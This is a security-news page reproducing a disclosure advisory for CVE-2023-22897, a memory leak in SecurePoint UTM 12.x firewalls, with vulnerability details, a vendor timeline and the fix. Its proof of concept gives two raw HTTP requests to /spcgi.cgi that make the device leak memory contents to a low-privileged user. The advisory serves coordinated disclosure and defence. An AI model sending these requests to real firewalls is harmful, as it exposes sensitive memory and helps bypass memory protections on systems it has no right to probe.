Security
Headlines
HeadlinesLatestCVEs

Headline

SecurePoint UTM 12.x Memory Leak

SecurePoint UTM versions 12.x suffers from a memory leak vulnerability via the spcgi.cgi endpoint.

Packet Storm
#vulnerability#web#js#git#rce#acer#auth

RCE Security Advisory
https://www.rcesecurity.com

  1. ADVISORY INFORMATION
    =======================
    Product: SecurePoint UTM
    Vendor URL: https://www.securepoint.de/en/for-companies/firewall-vpn
    Type: Use of Uninitialized Variable [CWE-457]
    Date found: 2023-01-05
    Date published: 2023-04-12
    CVSSv3 Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
    CVE: CVE-2023-22897

  2. CREDITS
    ==========
    This vulnerability was discovered and researched by Julien Ahrens from
    RCE Security.

  3. VERSIONS AFFECTED
    ====================
    SecurePoint UTM 12.2.5
    SecurePoint UTM 12.2.5
    SecurePoint UTM 12.2.4.1
    SecurePoint UTM 12.2.4
    SecurePoint UTM 12.2.3.4
    SecurePoint UTM 12.2.3.3
    SecurePoint UTM 12.2.3.2 Reseller Preview
    SecurePoint UTM 12.2.3.1 Reseller Preview

  4. INTRODUCTION
    ===============
    With secure networks, home office, site connectivity and the protection of your
    data are easy to implement. UTM firewalls and VPN gateways from Securepoint secure
    your networks - with suitable IT security solutions for small and medium-sized
    businesses for rent, purchase or as a complete service.

(from the vendor’s homepage)

  1. VULNERABILITY DETAILS
    ========================
    The firewall offers an administrative web panel on port 11115 and a user login
    panel on port 443. Both use the endpoint at “/spcgi.cgi” to perform authentication
    checks via the “login” command. Once authentication is successful (a low-privileged
    user account is sufficient), and the returned “sessionid” has never been used in
    any subsequent request, then the application will return remote memory contents
    within the sessionid JSON attribute on all subsequent requests (that don’t contain
    the sessionId, hence referring to as “unused”). The leaked memory contents include
    memory addresses as well as environment variables.

This happens because the application doesn’t correctly initialize a variable later
used in the JSON output referencing the sessionid.

Successful exploits can allow an authenticated attacker to leak memory contents,
which might contain sensitive information, and help defeat memory protections such
as ASLR.

  1. PROOF OF CONCEPT
    ===================
    First, authenticate using any legitimate user against either the admin panel on port
    11115 or the user panel on port 443 by using a single HTTP POST request like the
    following:

POST /spcgi.cgi HTTP/1.1
Host: 192.168.175.1
Content-Length: 100
Accept: /
Content-Type: application/json; charset=UTF-8
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

{"module":"auth","command":[“login”],"sessionid":"","arguments":{"user":"user","pass":"Password"}}

This returns a sessionid, which you must not use in subsequent requests. This is
important because the exploit won’t work if you authenticate using the web interface
because the sessionid is immediately “used” in further requests being issued by the
application.

Then submit any JSON request without a sessionid against the same endpoint, such as:

POST /spcgi.cgi HTTP/1.1
Host: 192.168.175.1
Content-Length: 2
Accept: /
Content-Type: application/json; charset=UTF-8
User-Agent: test
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

{}

The remote memory contents are afterward leaked in response to that request within
the sessionid JSON attribute.

  1. SOLUTION
    ===========
    Upgrade to version 12.2.5.1 or newer

  2. REPORT TIMELINE
    ==================
    2023-01-04: Discovery of the vulnerability
    2023-01-06: Contacted vendor via a known contact
    2023-01-06: Vendor response
    2023-01-06: Sent full vulnerability details to vendor
    2023-01-06: Vendor acknowledged the vulnerability
    2023-01-06: Vendor asks to set the disclosure date to 2023-04-11 due to the # of affected customers
    2023-01-06: RCE Security agrees to the proposed disclosure date
    2023-01-06: Vendor publishes hotfix 12.2.5.1 which fixes the vulnerability
    2023-01-10: MITRE assigns CVE-2023-22897
    2023-04-12: Public disclosure

  3. REFERENCES
    ==============
    https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/
    https://github.com/MrTuxracer/advisories

Related news

CVE-2023-22897: advisories/CVE-2023-22897.txt at master · MrTuxracer/advisories

An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution